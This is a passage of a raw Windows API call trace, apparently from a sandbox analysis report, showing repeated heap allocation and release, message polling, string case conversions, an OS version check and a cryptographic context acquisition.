lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0210.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0210.582] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0210.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0210.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0210.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0210.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0210.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0210.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0210.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0210.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0210.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0210.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0210.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0210.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0210.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0210.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0210.583] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.583] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0210.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0210.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0210.584] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.584] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0210.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0210.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0210.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.584] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0210.584] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.584] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0210.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.584] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.584] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0210.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0210.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0210.585] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0210.585] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0210.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0210.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0210.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.585] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.585] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0210.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0210.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0210.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0210.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.586] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.586] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.586] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0210.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0210.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.586] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0210.586] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0210.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0210.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0210.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0210.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0210.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.587] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0210.587] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0210.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0210.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.587] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.587] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.587] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.587] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.587] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0210.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0210.587] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.587] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.587] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0210.587] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.587] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0210.587] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0210.587] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0210.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6f60, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0210.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0210.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f71e0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0210.588] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c088) returned 1 [0210.589] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.589] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.589] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0210.589] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.589] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0210.589] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.589] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.589] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.589] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.590] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.590] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.590] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0210.590] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.590] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0210.590] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.590] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.590] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.590] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.590] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.590] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.590] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.590] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0210.590] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.590] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0210.590] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.590] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.590] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.590] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.590] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.590] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.590] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.590] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0210.591] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.591] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0210.591] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.591] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.591] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.591] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.591] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.591] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.591] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.591] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.591] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.592] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0210.592] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 